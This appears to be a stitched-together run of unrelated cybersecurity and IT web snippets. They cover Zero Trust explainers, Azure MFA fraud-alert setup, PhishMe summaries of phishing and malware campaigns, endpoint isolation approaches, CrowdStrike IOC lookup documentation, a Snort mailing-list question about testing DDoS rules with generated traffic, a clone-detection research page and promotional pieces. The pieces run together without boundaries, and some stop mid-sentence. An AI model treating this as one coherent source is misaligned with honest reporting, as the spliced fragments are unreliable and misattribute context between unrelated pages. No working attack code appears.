https://www.chip.de/downloads/Firefox-64-Bit_85086969.html [archive] https://www.webcitation.org/6mgUDIObc [archive] chip.denow enforces https for its entire website. - https://www.schneier.com/blog/archives/2017/01/class_breaks.html [archive] - https://answers.microsoft.com [archive] is mostly(?) user-to-user discussion. Mostly: hard to find any employees posting there or very low interaction. A volunteer moderator isn't a developer. [archive] There is also https://techcommunity.microsoft.com [archive]. - Link as evidence pointing to the fact that Microsoft does have an internal issue tracker: https://www.engadget.com/2017-10-17-microsoft-bug-database-hacked-in-2013.html [archive] Example quote [archive]: I doubt microsoft is telling everything, im sticking with W7 indefinitely. Hmm, guess I'm going back to windows 7. This is why I went from using the beta build as my primary OS back to Windows 8.1. And now myself and everyone in my family will be staying with their current OS (Windows XP, Vista, 7 and 8.1). - Because a previous update was a prerequisite for getting the next update. This is a wiki. Want to improve this page? Help is welcome and volunteer contributions are happily considered! Read, understand and agree to Conditions for Contributions to Whonix ™, then Edit! Edits are held for moderation. Policy of Whonix Website and Whonix Chat and Policy On Nonfreedom Software applies. Copyright (C) 2012 - 2021 ENCRYPTED SUPPORT LP. Whonix ™ is a trademark. Whonix ™ is a licensee [archive] of the Open Invention Network [archive]. Unless otherwise noted, the content of this page is copyrighted and licensed under the same Freedom Software license as Whonix ™ itself. (Why?) The personal opinions of moderators or contributors to the Whonix ™ project do not represent the project as a whole.
So what is Zero-Trust? Have you ever heard of “Trust, but verify”? Think of Zero-Trust as “Never Trust and always verify.” Zero Trust is a security framework that requires all users, whether in or outside the organization’s network, to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data. Zero Trust was created based on the realization that traditional security models operate on the outdated assumption that everything inside an organization’s network should be implicitly trusted. However in May 2021, Biden issued an executive order mandating U.S. Federal Agencies to adhere to NIST 800-207 as a required step for Zero Trust implementation. Which is a framework security professionals are already familiar with. As a result, the standard has gone through heavy validation and inputs from a range of commercial customers, vendors, and government agencies stakeholders – which is why many private organizations view it as the defacto standard for private enterprises. However, pulling this type of framework off is no easy feat. One would need to have the following: - Risk-based multi-factor authentication - Identify Protection - End Point security - cloud workload technology to verify a user or systems identity - Consideration of access at that moment in time. Zero-trust is the new buzzword because more than 80% of all attacks involve credentials or misuse in the network. All these news attacks being utilized by credentials, identify stores and email security to web gateway providers. Zero-trust helps ensure greater password security, the integrity of accounts, adherence to organizational rules, and avoidance of high-risk shadow IT services.
Several times while using the system you may come across caution sign on Mac which makes you frustrated by restricting you from accessing required data. There are numbers of warning signs arises during access of Mac machine, among them few appears while opening the computer or some of them evoke while accessing file or folder. Among different caution sign on Mac some of them can be faced in form of Prohibitory sign, Monitor Smart warnings, caution with Logos, warning with question marks etc. Due to appearance of such unexpected messages on the screen user get tensed and want to overcome it quickly, because it completely restrict users to access related items. It is almost data loss situation in which user can only see their file on Mac machine but unable to open them. Some of the caution sign on Mac can be resolved manually, but it needs technical skills. If you have such type of knowledge then you can go for attempting it, but when you are unable and do not have valid backup of inaccessible files then do not take risk. It is better to leave this option and opt for Mac Data Recovery Software to again access files even after getting unwanted caution sign on Mac OS X.
With the fraud alert feature, users can report fraudulent attempts to access their resources using their phone or the mobile app. This is an MFA Server (on-premises) feature. Fraud alerts are configured from the Azure portal, in the Azure Active Directory settings. Take the following steps: - Navigate to the Azure portal by opening https://portal.azure.com. - Select All services, then type Azure Active Directory in the search bar and open the settings. - Under Security, select MFA as follows: - The Getting started blade is automatically opened. Under Settings, select the Fraud alert. - The Fraud alert settings page is opened. In here, you can enable users to submit fraud alerts as follows: - Click the Save button to save the settings.
When we think of Greek-themed malware, the trojan family generally comes to mind. Not anymore, Sigma is a new ransomware delivered via phishing email. With it being flu season, no one wants to hear that a new strain of the flu has been discovered. Just as network defenders will not be excited that Locky ransomware has evolved yet again. This time however, threat actors decided to add a darker theme to code. PhishMe® analyzes phishing attacks intended for corporate email all the time—phishing for corporate email credentials, malware delivery, etc. However, we also analyze phishing for consumer service credentials—think online shopping or Netflix—since it is also a part of the threat landscape. On July 13, 2017, the Phishing Defense Center reviewed a phishing campaign delivering Hawkeye, a stealthy keylogger, disguised as a quote from the Pakistani government’s employee housing society. Although actually a portable executable file , once downloaded, it masquerades its icon as a PDF. Phishing scams masquerading as PayPal are unfortunately commonplace. Most recently, the PhishMe Triage™ Managed Phishing Defense Center noticed a handful of campaigns using a new tactic for advanced PayPal credential phishing. The phishing website looks very authentic compared to off-the-shelf crimeware phishing kits, but also levels-up by asking for a photo of the victim holding their ID and credit card, presumably to create cryptocurrency accounts to launder money stolen from victims. On May 22, 2017, PhishMe® received several emails with .ISO images as attachments via the Phishing Defense Center. ISO images are typically used as an archive format for the content of an optical disk and are often utilized as the installers for operating system. However, in this case, a threat actor leveraged this archive format as a means to deliver malware content to the recipients of their phishing email. Analysis of the attachments showed that this archive format was abused to deliver malicious AutoIT scripts hidden within a PE file that appears to be a Microsoft Office Document file, which creates a process called MSBuild.exe and caused it to act as a Remote Access Trojan. AutoIT is a BASIC-like scripting language designed for automating Windows GUI tasks and general scripting. Like any scripting or programming language, it can be used for malicious purposes.
There’s no silver bullet when it comes to endpoint security. No matter how many security tools enterprises layer on, or how locked-down user devices are meant to be, determined cybercriminals can still ferret through the cracks. That’s why the best cybersecurity approach is to acknowledge that hackers will get through and to employ isolation solutions that limit your exposure and mitigate damage. In recent years, four isolation approaches have emerged as most promising: browser isolation, app sandboxing, physical air gap and virtual air gap. The best way to evaluate them for your needs is to view them from the user’s perspective, the IT admin’s perspective and, importantly, the attacker’s perspective. So here we go… This requires end-users to access the web via a browser application running on a locked-down virtual machine (VM) in the cloud. It blocks malicious web content from the endpoint device, which is a good thing. But while this frustrates attackers, it doesn’t stop them from exploiting other vulnerabilities, like email downloads, other applications, USBs and the device operating system (OS). From the end-users’ standpoint, having open web access is a big plus – no one wants to be blocked from the internet. Performance and reliability issues can crop up, however, and impact productivity. And IT admins have to deal with browser compatibility issues and potential attacks on those other endpoint areas. This entails executing an application in its own sandbox using virtual machines VMs or other application isolation techniques.Threats coming from a sandboxed application are contained so they can’t access the endpoint device’s OS or data. However, like browser isolation, this doesn’t protect other attack vectors from cybercriminals, including different versions of the same app, the many unsupported applications, the device’s OS, middleware, malicious external hardware or networks. Unfortunately for end-users, performance takes a hit. Each instance of each sandboxed application runs in a separate VM or other containerization solution, consuming resources on the device. Separating applications into VMs also creates inherent interoperability issues that require a lot of IT admin time to mitigate. Plus, because it’s time-consuming and costly to keep sandboxed apps up to date, security patches are often delayed and security risks rise. In short, app sandboxing may be a good first step for small organizations, but it causes more problems than it solves for enterprises that have dozens or hundreds of applications. Physical Air Gap A popular endpoint security strategy for people who have access rights to sensitive data, this requires two separate physical machines for each privileged user. One, commonly known as the Privileged Access Workstation (PAW), is dedicated solely to sensitive tasks and is locked down; the other unlocked machine is for day-to-day corporate work. Attackers have a very hard time penetrating sensitive data unless they have access to the machine itself. They can’t use popular internet or email entry points. And if external drivers like USBs are disabled on the PAW, they can’t get through that way either. Of course, cybercriminals who target the “corporate” machine will have more luck infiltrating that device, but they won’t be able to access the crown jewels, which is what they’re looking for in the first place. From end-user and IT admin viewpoints, physical air gaps have pretty significant downsides. End-users must physically move from one machine to another throughout the day, which can add up to several hours of lost productivity per week. And they have to lug two computers around. IT admins also have twice the burden and overhead since they have double the number of devices to manage with two very different permission settings. Virtual Air Gap Virtual air gap uses a single physical machine to deliver the same-grade security as physical air gap. In this case, an end-user device is transformed into multiple, fully isolated virtual OS environments, or endpoints. Everything an end-user does happens in segregated, local OSes that run side-by-side, one of which can be locked down and dedicated to sensitive work and the other open to internet and email. Attackers aren’t enamored with virtual air gap. It blocks them from taking over the device and accessing sensitive resources. Any attackers who penetrate the unlocked OS cannot see, access or control the sensitive VM. And if the unlocked OS is configured to be non-persistent, that malware disappears. But, as with physical air gap, attackers who get their hands on the device itself can infiltrate by hardware backdoors. End-users, on the other hand, appreciate the performance and freedom virtual air gap gives them. They can access, install and freely work with websites, apps, external devices like USBs, and cloud services without worrying about compromising their company’s crown jewels. IT admins like how virtual air gap eases their management burden. Because it protects some of the same attack vectors that other endpoint security approaches focus on, IT can eliminate several agents. Other security agents can be moved below the OS, where users cannot access, tweak or bypass them. Endpoint security doesn’t have to be an oxymoron. By matching the right isolation technologies to your users, enterprises can keep sensitive data secure and users productive. Tal Zamir, CTO, Hysolate
Cybex Information Exchange Tool (cybiet) -- A Cybex Discovery and Cybex BEEP profile implementation The Cybersecurity Information Exchange Framework (CYBEX) will radically change the way cybersecurity entities interact with each other. In order to elaborate in more technical detail, designers and practitioners of CYBEX will have to explore design space in sufficient detail, while at the same time benchmarking the usefulness of proposed framework in particular scenarios. Because of this, NICT implemented cybersecurity information exchange tool (tentatively named Cybiet) that provides discovery and exchange functions, corresponding to standards development of Cybex Discovery and Cybex BEEP profile. Please note that this is an initial "proof of concept" implementation for exploration of both ideas and design space. As such, the breath and depth of supported cybersecurity information elements are deliberately kept Usage scenarios of Cybex Discovery Cybex Discovery enables discovery of cybersecurity entities -- that is, mapping resource identifier to endpoint and capabilties. We envision a better connected world where cybersecurity entitites of various scale and diverse capabilities are registered to one of the registries -- either global, regional or private. Cybersecurity entities are enumerated in RDF/OWL format, and each cybersecurity organization aggregates such structured resource descriptions from accessible registries. Aggregated cybersecurity information is made discoverable through Cybex Discovery server, which responds to discovery requests from clients by considering name, country and/or capability. Consider a situation where you have an ICT asset from distant country whose vulnerability database is not widely known around you. With Cybex Discovery, you can discover vulnerability database and make sure your ICT asset receive appropriate Technical details of Cybex Discovery This Cybex Discovery implementation focuses on RDF/OWL decentralized mode of discovery; for this purpose, Raptor RDF syntax library and Rasqal RDF query library are used. A very simple registry-server implementation is provided for demonstration purposes, which stores RDF/OWL-based enumeration of Usage scenarios of Cybiet BEEP Here we consider the scenario of information feed from security information service provider to several customers. Each customer, running the Cybex BEEP client, registers for an update feed from security service information provider running the Cybex BEEP server; the Cybex BEEP server responds immediately with current list of incident objects represented in IODEF. Cybex BEEP server can periodically send updates to clients with latest list of incident objects. It can also send urgent notification to specfic customer at any point, if such need The Cybex BEEP client may request SPAM hosts, SPAM server, Fast Flux hosts or Phishing hosts by specifying information type. There are of course many other scenarios where this kind of flexible information feed is useful; these four types of information are defined in advance just to show some usage Technical detail of Cybiet BEEP Cybex BEEP profile enables bidirectional exchange of structured cybersecurity information between BEEP client and BEEP server. Two or more cybersecurity entities are assumed to be connected by Cybiet BEEP client/server. One end of the communicating peer may choose to become BEEP client (connection initiator), and another end may become BEEP server (responder). We assume that existing cybersecurity data-sources act as HTTP server; asynchronous notification, if need arises, may be sent to BEEP server (and then to BEEP client) directly. Cybiet BEEP is intended to be a "skinny, lightweight" implementation; it consists of XML data-binding, prototypical BEEP profile, and interface to HTTP server. Most of XML data-binding code is generated from IODEF XML schema using Codesynthesis XSD. Basic BEEP protocol stack is provided by Vortex BEEP library from ASPL. HTTP interface simply uses libcurl HTTP library. Currently, only IODEF XML schema (with CAPEC attack pattern ID) is supported in this implementation. With XML namespace, it becomes feasible to incorporate part of XML-based enumeration standards into application-oriented standards like IODEF. In this implementation, we were interested in implementation-level feasibility of exploiting XML namespace capability. BEEP profile implementation is also minimal. Through the implementation of prototype BEEP profile, we were interested in the implementation-level feasibility of rich mode of interaction that BEEP enables -- push mode as well as pull mode. Cybiet is written in C++ and it can be downloaded from Sourceforge. It should run on modern Linux distributions.
Look up IOCs (Indicators of Compromise) of IP addresses, URLs and domains in a local copy of CrowdStrike's curated database of IOCs and annotate the events with the associated security information. |string||false||high||The lowest level of confidence of IOCs to consider. Valid values are | |[string]||true||The field(s) containing either IP addresses, URLs or domains to check for IOCs.| |[string]||false||All columns||Specifies the columns from the IOC database to include. Valid columns are: | |string||false||ioc||Prefix for the names of all the output fields.| |string||true||Specifies the type of IOCs to look for. Valid types are: | If any of the selected fields match an IOC, the field <prefix>.detected will be added with the value <prefix> is the value of the prefix argument. Also, for each field matching an IOC, there will be added fields <index> is the first unused index, starting with 0, and column is one of the column names selected IP addresses can be either IPv4 or IPv6 addresses. Short-hand notation for IPv6 addresses is supported and can be matched against non-short-hand notation. URLs and domains use case-insensitive string matching. The function can be negated, but only with For information about how to configure the IOC database, see IOC Configuration. |indicator||string||The IOC that was found in the event field.| The type of IOC detected. One of | |published_date||Timstamp in Unix time, UTC||The date the IOC was first published.| |last_updated||Timstamp in Unix time, UTC||The date the IOC was last updated.| The confidence level by which an IOC is considered to be malicious. Will change over time. | |labels||string||Detailed information about the IOC, see below.| labels contains a comma-separated list of labels that provide additional context around an indicator. The labels have the form category/value. The categories are Have the form "Actor/...". The named actor that the indicator is associated with (e.g. "Panda", "Bear", "Spider", etc). Have the form "Malware/...". Indicates the malware family an indicator has been associated with (e.g. "Malware/PoisonIvy", "Malware/Zeus", "Malware/DarkComet", etc). An indicator may be associated with more than one malware family. Have the form "KillChain/...". The point in the kill chain at which an indicator is associated. Reconnaissance: This indicator is associated with the research, identification, and selection of targets by a malicious actor. Weaponization: This indicator is associated with assisting a malicious actor create malicious content. Delivery: This indicator is associated with the delivery of an exploit or malicious payload. Exploitation: This indicator is associated with the exploitation of a target system or environment. Installation: This indicator is associated with the installation or infection of a target system with a remote access tool or other tool allowing for persistence in the target environment. C2(Command and Control): This indicator is associated with malicious actor command and control. ActionOnObjectives: This indicator is associated with a malicious actor's desired effects and goals. Have the form "DomainType/...". ActorControlled: It is believed the malicious actor is still in control of this domain. DGA: This domain is the result of malware utilizing a domain generation algorithm. DynamicDNS: This domain is owned or used by a dynamic DNS service. DynamicDNS/Afraid: This domain is owned or used by the Afraid.org dynamic DNS service. DynamicDNS/DYN: This domain is owned or used by the DYN dynamic DNS service. DynamicDNS/Hostinger: This domain is owned or used by the Hostinger dynamic DNS service. DynamicDNS/noIP: This domain is owned or used by the NoIP dynamic DNS service. DynamicDNS/Oray: This domain is owned or used by the Oray dynamic DNS service. KnownGood: The domain itself (or the domain portion of a URL) is known to be legitimate, despite having been associated with malware or malicious activity. LegitimateCompromised: This domain does not typically pose a threat but has been compromised by a malicious actor and may be serving malicious content. PhishingDomain: This domain has been observed to be part of a phishing campaign. Sinkholed: The domain is being sinkholed, likely by a security research team. This indicates that, while traffic to the domain likely has a malicious source, the IP address to which it is resolving is controlled by a legitimate 3rd party. It is no longer believed to be under the control of the actor. StrategicWebCompromise: While similar to the DomainType/LegitimateCompromisedlabel, this label indicates that the activity is of a more targeted nature. Oftentimes, targeted attackers will compromise a legitimate domain that they know to be a watering hole frequently visited by the users at the organizations they are looking to attack. Unregistered: The domain is not currently registered with any registrars. IP Address Types Have the form "IPAddressType/...". HtranDestinationNode: An IP address with this label is being used as a destination address with the HTran Proxy Tool. HtranProxy: An IP address with this label is being used as a relay or proxy node with the HTran Proxy Tool. LegitimateCompromised: It is suspected an IP address with this label is compromised by malicious actors. Parking: This IP address is likely being used as parking IP address. PopularSite: This IP address could be utilized for a variety of purposes and may appear more frequently than other IPs. SharedWebHost: This IP address may be hosting more than one website. Sinkhole: This IP address is likely a sinkhole being operated by a security researcher or vendor. TorProxy: This IP address is acting as a TOR (The Onion Router) Proxy. Have the form "Status/...". ConfirmedActive: This indicator is likely to be currently supporting malicious activity. ConfirmedInactive: This indicator is no longer used for malicious purposes. Historic: The indicator is no longer used for malicious purposes but could be used again in the future. Have the form "Target/...". The activity associated with this indicator is known to target the indicated vertical sector, which could be any of the following: - Have the form "ThreatType/...". ClickFraud: This indicator is used by actors engaging in click or ad fraud Commodity: This indicator is used with commodity type malware such as Zeus or Pony Downloader. PointOfSale: This indicator is associated with activity known to target point-of-sale machines such as AlinaPoS or BlackPoS. Ransomware: This indicator is associated with ransomware malware such as Crytolocker or Cryptowall. Suspicious: This indicator is not currently associated with a known threat type but should be considered suspicious. Targeted: This indicator is associated with a known actor suspected to associated with a nation-state such as DEEP PANDA or ENERGETIC BEAR. TargetedCrimeware: This indicator is associated with a known actor suspected to be engaging in criminal activity such as WICKED SPIDER. Have the form "Vulnerability/...". The CVE-XXXX-XXX vulnerability the indicator is associated with (e.g. "Vulnerability/CVE-2012-0158"). If you use this function in a query and it does not produce any IOC results, it can be hard to tell whether there were no results or there is an error in the query. To help with that, we provide some sample IOCs that you can test your query with: Note that since the IOC database is updated constantly, we cannot guarantee that these remain in the database. If you believe that one of them is no longer in the database, please contact us. Also, the malicious_confidence of these IOCs will probably be lowered over time. If you have a query using the ioc:lookup() function on the field client_ip, you can alter that query and add client_ip:="126.96.36.199" to the query before the ioc:lookup() function to have it match a known IOC. You might need to add as argument to the ioc:lookup() function in order to find this IOC. Look up IP address IOCs for the field ip and annotate events with the associated security information. Only include the columns ioc:lookup("ip", type=ip_address, include=["malicious_confidence", "labels"]) Use the prefix detection as prefix for any added ioc:lookup("ip", type="ip_address", prefix="detection") Look up URL IOCs for the field url and search IOCs of all confidence levels. ioc:lookup("url", type="url", confidenceThreshold="low") Look up URL IOCs for the field url and only keep the events containing an IOC. Useful for finding IOCs in queries used for alerts or scheduled searches. ioc:lookup("url", type="url", strict=true)
NETWORK TELEPHONY –VOICE OVER INTERNET PROTOCOL(VoIP) VoIP is a set of technologies that enable voice calls to be carried over the internet (or other networks designed for data), rather than the traditional telephone landline system-the Public Switched Telephone Networks(PSTN). VoIP uses IP protocols, originally designed for the internet, to break voice calls up into digital ‘packets’. In order for a call to take place the separate packets travel over an IP network and are reassembled at the far end. The breakthrough was in being able to transmit voice calls, which are much more sensitive to any time delays or problems on the network, in the same way as data. Packetised voice also enables much more efficient use of the network because bandwidth is only used when something is actually being transmitted. Also, the network can handle connection from many applications and many users at the same time, unlike the dedicated circuit-switch approach. The basic process involved in a VoIP calls is as follows: Conversion of the callers analogue voice signal into a digital format. Compression and translation of the digital signal into discrete Internet Protocol packets. Transmission of the packets over Internet or other IP-based network. Reverse translation of packets into an analogue voice signal for the call recipient. The digitisation and transmission of the analogue voice as a stream of packets is carried out over a digital data network that can carry data packets using IP and other, related Internet protocols. This network may be an organisation’s internal LAN, a leased network, the PSTN or the open Internet. The compression process is carried out by a codec, a voice-encoding algorithm, which allows the call to be transmitted over the IP network within the network’s available bandwidth. To make a VoIP call, the consumer user requires VoIP software and a broadband connection to the Internet. The software will handle the call... Please join StudyMode to read the full document
String Pattern Matching and Tools for Analyzing Code Brenda S. Baker - Software tools and algorithms for analyzing source code I developed a theory of parameterized string pattern matching described in [2, 4,6-7,11] for "parameterized strings" (p-strings) that can contain special parameter symbols. If two such strings are a parameterized match (p-match), it is possible to transform one into the other via systematically replacing parameters in one string by different parameters in the other, analagous to fun everywhere throughout a region of code. Given source code and a threshold length set by the user, Dup [5,6,8,11] finds all pairs of maximal regions that are over the threshold length and are either identical textually or are p-matches. Dup can also be used to find exact duplication in text or genomic data. A scatter plot produced by Dup for a million-line production subsystem is shown here. Pairs of similar sections of code are sometimes called "clones." An analysis of results from a joint experiment with other software tools for finding clones is given in . Pdiff finds the smallest edit distance between two source files based on edit operations of insertion, deletion, and p-match. It generates HTML to display the two files side by side with the differences marked. The algorithm is given in . - Software tools for analyzing executables without access to source code - Identifying related executables Compiling related Java programs can result in very different bytecode files, when these files are viewed as raw bytes. In order to identify bytecode files from related source files without access to the source, several techniques were used to adapt Dup (above), Udi Manber's tool Siff, and the UNIX utility Diff to deal with bytecode files . Our tools make it possible to find similarities among thousands of bytecode files, or to compare one new file to an index of many old ones. Possible applications include detection of plagiarized code, software reuse, program management, and uninstallers. - Exediff - patch files for executables For source files, updates are commonly distributed as patches. When source code can't be given out or when data transmission rates are slow, it would be convenient to distribute updates to executables as patch files as well. The difficulty is that when primary changes are made to source code, secondary changes (e.g. in pointers or jumps), can propagate throughout the executable. uses heuristics to reconstruct secondary changes where possible in order to keep patch files small. For the Alpha architecture, a comparison of the sizes of gzipped patch files created by Exediff and utility (which compares raw bytes) showed that Exediff generally saved a factor of two for major version changes and a factor of five for minor version changes . I also implemented a version of Exediff for Java bytecode files. Selected Papers on String Pattern Matching and the above projects Brenda S. Baker, Finding Clones with Dup: Analysis of an Experiment, IEEE Trans. on Software Engineering 33,9, Sept. 2007, pp. 608-621. gzipped PostScript Brenda S. Baker and Raffaele Giancarlo, Sparse Dynamic Programming for Longest Common Subsequence from Fragments, J. Algorithms 42,2, 2002, pp. 231-254. gzipped PostScript Brenda S. Baker, Udi Manber, and Robert Muth, Compressing Differences of Executable Code, in Proc. of the ACM SIGPLAN 1999 Workshop on Compiler Support for System Software (WCSSS'99), 1999, pp 1-10. gzipped PostScript Brenda S. Baker, Parameterized Diff, Proc. of ACM-SIAM Symposium on Discrete Algorithms (SODA), Jan. 1999, pp. S854-S855. gzipped PostScript Brenda S. Baker and Udi Manber, Deducing Similarities in Java Sources from Bytecodes, in Proc. of the USENIX Annual Technical Conference, 1998, pp. 179-190. gzipped PostScript Brenda S. Baker and Raffaele Giancarlo. Longest Common Subsequence from Fragments via Sparse Dynamic Programming, Algorithms: 6th European Symposium Proceedings (ESA '98), Lecture Notes in Computer Science 1461, 1998, pp. 79-90. Brenda S. Baker, Parameterized Duplication in Strings: Algorithms and an Application to Software Maintenance, SIAM J. on Computing 26,5, Oct. 1997, 1343-1362. Brenda S. Baker, Parameterized String Pattern Matching. JCSS 52,1, Feb. 1996, 28-42. Brenda S. Baker, Parameterized Pattern Matching by Boyer-Moore-type Proc. of the Sixth ACM-SIAM Symposium on Discrete Algorithms (SODA), 1995, 541-550. Brenda S. Baker, On Finding Duplication and Near-Duplication in Large Proc. of the Second Working Conf. on Reverse Engineering, 1995, pp. 86-95. Received IEEE Outstanding Paper Award. gzipped PostScript Brenda S. Baker, A Theory of Parameterized Pattern Matching: Algorithms and Applications (Extended Abstract), Proceedings of the 25th ACM Symposium on Theory of Computing (STOC '93), 1993, 71-80. gzipped PostScript Last modified: Sat Jan 22 21:16:12 PST 2011
What is Zero Trust? Zero Trust is a security approach that mandates verification, employs least privilege, and operates under the assumption of a breach for every access request to a private network, irrespective of its origin or destination. Its foundation rests on several principles to improve your security: - Explicit Verification: All access attempts are authenticated and authorized based on a comprehensive set of data points, including user identity, location, device health, service or workload, data classification, and anomalies. - Least Privilege Access: Access is restricted to the bare minimum necessary using techniques such as just-in-time and just-enough access (JIT/JEA), risk-based adaptive policies, and data protection measures, thus securing both data and productivity. - Assume Breach: To minimize the impact of potential breaches, access is segmented, and the blast radius is reduced. End-to-end encryption is validated, and analytics are utilized for visibility, threat detection, and defense enhancement. Zero Trust extends across six core elements: - Identities: People, services, and IoT components are verified and authorized based on multiple data points, such as user identity, location, and device health. - Devices: Endpoints accessing the network are monitored for compliance with device health standards and updated regularly. - Apps and APIs: Applications and services running on the network are secured with appropriate permissions, configurations, and vulnerability scans. - Data: Information flowing through the network is protected using encryption, classification, and access policies, while anomalies are monitored. - Infrastructure: Physical and virtual resources hosting the network are hardened against attacks and segmented to minimize breach impact. - Networks: Connections between elements are controlled using segmentation, encryption, and analysis, and verified end-to-end. This approach require a comprehensive and integrated security strategy encompassing the entire digital infrastructure. Some benefits of Zero Trust security include: - Enhanced Employee Experience: Employees can securely work from any location and on any device. - Facilitated Digital Transformation: Intelligent security supports complex and hybrid environments. - Reduced Vulnerabilities: Granular policies and closed security gaps minimize security risks and lateral movement. - Protection from Threats: Layered defense explicitly verifies all access requests, safeguarding against internal and external threats. - Regulatory Compliance: Helps comply with evolving regulatory requirements by offering a consistent and transparent data protection strategy. How does it work in Office 365? Zero-trust works in Office 365 by applying the following security capabilities: - Conditional Access: This allows you to enforce granular policies based on user, device, app, location, and risk factors. For example, you can require multifactor authentication, device compliance, or app protection for accessing specific resources or data. - App protection policies: This allows you to protect the data within Office 365 apps on mobile devices, such as Outlook, Word, Excel, etc. For example, you can restrict copy-paste, screen capture, or external sharing of sensitive data. - Device compliance policies: This allows you to check the health and compliance status of devices that access Office 365. For example, you can require devices to have a PIN, encryption, antivirus, or latest updates. - Microsoft Defender for Office 365: This provides threat protection and intelligence for Office 365 apps and services, such as email, SharePoint, Teams, etc. For example, it can detect and block phishing, malware, ransomware, or spoofing attacks. How to apply Zero Trust principles to Azure infrastructure as a service (IaaS)? Zero Trust in the context of Infrastructure as a Service (IaaS) in Azure refers to a security model where no implicit trust is granted to assets based on their location (inside or outside the network) or on their identity (whether they are external or internal users). In a traditional security model, once someone gains access to the network, they might be trusted to access various resources within that network. Zero Trust, on the other hand, assumes that threats could come from both inside and outside the network, and thus, trust should not be granted based solely on the user’s location or identity. In Azure IaaS, Zero Trust is implemented through various security measures and technologies: - Identity and Access Management (IAM): Azure Active Directory (AAD) is often used to manage user identities and their access to Azure resources. With Zero Trust, access controls are enforced based on a user’s identity, their role, and other contextual factors such as the device being used and the location from which the access is attempted. - Multi-Factor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide multiple forms of authentication before granting access. This could include something they know (like a password) and something they have (like a mobile device for receiving a verification code). - Conditional Access Policies: Azure allows administrators to define policies that control access to resources based on certain conditions, such as the user’s location, device health, or the sensitivity of the resource being accessed. This ensures that access is granted only when specific conditions are met. - Network Segmentation: Azure Virtual Networks (VNETs) can be segmented into smaller, isolated networks using Network Security Groups (NSGs) and Virtual Network Service Endpoints (VNET service endpoints). This helps in minimizing the attack surface and containing potential breaches within specific segments of the network. - Encryption: Azure offers various encryption options to protect data both at rest and in transit. This includes Azure Disk Encryption for encrypting virtual machine disks, Azure Storage Service Encryption for encrypting data stored in Azure Storage, and Azure VPN Gateway for encrypted communication between virtual networks. - Continuous Monitoring and Threat Detection: Azure Security Center provides continuous monitoring of Azure resources and detects potential security threats using advanced analytics and machine learning algorithms. It can identify suspicious activities and recommend actions to mitigate risks. - Just-In-Time (JIT) Access: Azure Security Center allows administrators to restrict access to Azure VMs by enabling JIT access. This means that access to VMs is only granted when needed and for a limited time window, reducing the attack surface and minimizing the risk of unauthorized access. What are the key success factors to set-up a Zero Trust Model in your company? Instead of assuming everything behind the corporate firewall is safe, the Zero Trust model assumes breach and verifies each request as though it originates from an open network. Regardless of where the request originates or what resource it accesses, Zero Trust teaches us to “never trust, always verify.” Every access request is fully authenticated, authorized, and encrypted before granting access. Microsegmentation and least-privilege access principles are applied to minimize lateral movement. Rich intelligence and analytics are utilized to detect and respond to anomalies in real time. Zero Trust should cover your whole digital environment—including identities, endpoints, network, data, apps, and infrastructure. Zero Trust architecture is a complete end-to-end plan that needs integration across the elements.The basis of Zero Trust security is identities. Both human and non-human identities need strong authorization, connecting from either personal or corporate endpoints with compliant devices, asking for access based on strong policies based on Zero Trust principles of explicit verification, least-privilege access, and assumed breach.As a unified policy enforcement, the Zero Trust policy stops the request, explicitly verifies signals from all six basic elements based on policy configuration and allows least-privilege access. Signals include the user’s role, location, device compliance, data sensitivity, and app sensitivity. Besides telemetry and state information, the risk assessment from threat protection inputs into the policy engine to automatically deal with threats in real time. Policy is applied at the time of access and continuously checked throughout the session.This policy is further improved by policy optimization. Governance and compliance are essential to a strong Zero Trust implementation. Security posture assessment and productivity optimization are needed to measure the telemetry across the services and systems.The telemetry and analytics inputs into the threat protection system. Large amounts of telemetry and analytics enriched by threat intelligence produces high-quality risk assessments that can be either manually investigated or automated. Attacks occur at cloud speed and, because humans can’t react fast enough or go through all the risks, your defense systems must also act at cloud speed. The risk assessment inputs into the policy engine for real-time automated threat protection and additional manual investigation if needed.Traffic filtering and segmentation is applied to the evaluation and enforcement from the Zero Trust policy before access is given to any public or private network.Data classification, labeling, and encryption should be applied to emails, documents, and structured data. Access to apps should be adaptive, whether SaaS or on-premises. Runtime control is applied to infrastructure with serverless, containers, IaaS, PaaS, and internal sites with just-in-time (JIT and version controls actively engaged. Finally, telemetry, analytics, and assessment from the network, data, apps, and infrastructure are fed back into the policy optimization and threat protection systems.
[Snort-users] Detecting DDoS attacks with Snort Ana Serrano Mamolar B00315494 at ...17757... Mon Jan 23 05:25:57 EST 2017 I am a beginner with Snort. For my research, I would like to use Snort to detect DDoS attacks. So, what I have done is, first install Snort and download DDoS rules from here https://github.com/eldondev/Snort/blob/master/rules/ddos.rules. Then, I tried to generate some traffic that match some of this rules to see if Snort triggered alerts. I started to use scapy and I managed to generate ICMP and UDP DoS attacks, but not TCP for the moment, and not Distributed, but just DoS. I am open also to new ideas about that issue of generating traffic to simulate my attacks ( also pcaps would be suitable). My main worry, and the aim of this message, is that I am not sure to have understood well how Snort rules work. I don't understand why I am getting one alert per packet sent. So, if i send 2000 packets matching a rule I receive 2000 alerts. As far as I know, a DDoS attack attempt to overload systems, so one packet, is not a DoS attack. So, does somebody know how I should do a real experiment? Maybe that rules are not good to detect an attack? Maybe I am not running Snort in the proper mode? Thanks in advance -------------- next part -------------- An HTML attachment was scrubbed... More information about the Snort-users
Operational Complexity: The Biggest Security Threat to Your AWS Environment Managing tightly-controlled user access in AWS is too complex and leads to errors and sloppiness. There are six main reasons for this: 1. User access is IP-centric, and users’ IP addresses change 2. Dynamic environments cause extra administrative burdens 3. Complexity leads to shortcuts 4. Forced use of VPN connectivity to manage access control 5. Logging correlation complexities 6. AWS shared responsibility model adherence AWS makes it clear that security is a shared responsibility. While AWS is responsible for security ‘of’ the cloud, you’re responsible for what’s ‘in’ the cloud. So we turn to AWS Security Groups, but they introduce operational complexity with negative consequences. In our new eBook, Operational Complexity: The Biggest Security Threat to Your AWS Environment, we discuss some of the challenges with either wide-open access or tightly-controlled access in AWS. Both have consequences, so what do you do? Here’s an example of one those challenges: Four users access the Amazon environment from a known source. Their public IP address is the known source. The security groups are configured appropriately. The challenge is when users try to access from other locations. You can learn what new security model overcomes this challenge inside the eBook. Check out the eBook to learn more about what changes you’ll need to make with your AWS security moving forward.
